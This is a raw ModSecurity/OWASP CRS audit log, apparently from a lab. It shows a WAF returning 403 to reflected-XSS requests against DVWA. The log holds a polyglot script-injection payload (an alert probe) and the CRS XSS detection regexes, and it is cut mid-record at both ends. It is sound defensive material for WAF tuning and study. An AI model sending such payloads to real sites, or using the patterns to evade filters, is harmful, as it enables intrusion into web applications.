[client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 33)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=30,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): IE XSS Filters - Attack Detected.\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":613,"p2":3997,"p3":0,"p4":0,"p5":330,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:29:04 --0400","transaction_id":"WRc0UH8AAQEAAAkZ0BIAAAAE","remote_address":"192.168.75.145","remote_port":56780,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":580,"p2":3113,"p3":0,"p4":0,"p5":162,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:29:10 --0400","transaction_id":"WRc0Vn8AAQEAAAkVV4oAAAAA","remote_address":"127.0.0.1","remote_port":42048,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Wed, 10 May 2017 02:17:21 GMT","If-None-Match":"\"cca-54f22127f468d-gzip\"","Cache-Control":"max-age=0"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Wed, 10 May 2017 02:17:21 GMT","ETag":"\"cca-54f22127f468d-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1210","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc0Vn8AAQEAAAkVV4oAAAAA\"]"],"stopwatch":{"p1":386,"p2":977,"p3":75,"p4":547,"p5":64,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:29:10 --0400","transaction_id":"WRc0Vn8AAQEAAAkVV4sAAAAA","remote_address":"127.0.0.1","remote_port":42048,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:26:00 GMT","If-None-Match":"\"1a8-54f6a470f3057\"","Cache-Control":"max-age=0"}},"response":{"protocol":"HTTP/1.1","status":304,"headers":{"Last-Modified":"Sat, 13 May 2017 16:26:00 GMT","ETag":"\"1a8-54f6a470f3057\"","Accept-Ranges":"bytes","Content-Length":"0","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc0Vn8AAQEAAAkVV4sAAAAA\"]"],"stopwatch":{"p1":608,"p2":1233,"p3":59,"p4":146,"p5":63,"sr":33,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:13 --0400","transaction_id":"WRc0lX8AAQEAAAmHBJYAAAAF","remote_address":"192.168.75.145","remote_port":56782,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. 
